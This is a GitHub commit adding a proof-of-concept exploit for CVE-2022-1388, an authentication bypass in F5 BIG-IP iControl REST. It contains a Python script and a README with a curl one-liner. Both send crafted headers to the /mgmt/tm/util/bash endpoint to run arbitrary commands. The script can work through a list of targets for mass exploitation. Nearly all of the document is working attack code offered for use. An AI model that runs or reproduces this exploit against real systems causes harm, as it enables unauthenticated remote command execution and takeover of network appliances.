-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit a54a8bb
Showing
2 changed files
with
77 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,60 @@ | ||
| #!/usr/bin/env python3 | ||
| import argparse, requests, urllib3 | ||
| from termcolor import colored | ||
| import concurrent.futures | ||
| urllib3.disable_warnings() | ||
|
|
||
|
|
||
| def exploit(target, command): | ||
|
|
||
| try: | ||
|
|
||
| url = f'https://{target}/mgmt/tm/util/bash' | ||
| headers = { | ||
| 'Host': '127.0.0.1', | ||
| 'Authorization': 'Basic YWRtaW46', | ||
| 'X-F5-Auth-Token': '0', | ||
| 'Connection': 'X-F5-Auth-Token', | ||
| 'Content-Type': 'application/json' | ||
| } | ||
|
|
||
| j = {'command':'run','utilCmdArgs':'-c "{0}"'.format(command)} | ||
| r = requests.post(url, headers=headers, json=j, verify=False, timeout=5) | ||
|
|
||
| if ( r.status_code != 204 and r.headers['content-type'].strip().startswith('application/json')): | ||
| print(target + '\t> ' + r.json()['commandResult'].strip()) | ||
|
|
||
| else: | ||
| print(colored('Target is not vulnerable', "yellow", attrs=['bold'])) | ||
|
|
||
|
|
||
| except Exception as e: | ||
| print(colored(e, "yellow", attrs=['bold'])) | ||
|
|
||
|
|
||
| if __name__ == "__main__": | ||
|
|
||
|
|
||
| ## parse argument | ||
| parser = argparse.ArgumentParser() | ||
| parser.add_argument('-t', '--target', help='The IP address of the target, eg: 127.0.0.1:80', default=False) | ||
| parser.add_argument("-l", "--list", action="store", help="Target urls saperated with new line", default=False) | ||
| parser.add_argument('-c', '--command', help='The command to execute, eg: id', default='id') | ||
| args = parser.parse_args() | ||
|
|
||
| if args.target is not False: | ||
|
|
||
| exploit(args.target, args.command) | ||
|
|
||
| elif args.list is not False: | ||
|
|
||
| with open(args.list) as targets: | ||
|
|
||
| for target in targets: | ||
| target = target.rstrip() | ||
| exploit(target, args.command) | ||
|
|
||
| else: | ||
|
|
||
| parser.print_help() | ||
| parser.exit() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,17 @@ | ||
| # BIG-IP iControl REST vulnerability CVE-2022-1388 PoC | ||
|
|
||
| This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services | ||
|
|
||
| ## PoC | ||
|
|
||
| You can use the following curl one liner to check for the F5 BigIP vulnerability or use the provided python script. | ||
|
|
||
| ``` | ||
| cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done | ||
| ``` | ||
|
|
||
|
|
||
| ## References | ||
|
|
||
| https://support.f5.com/csp/article/K23605346 | ||
| https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit |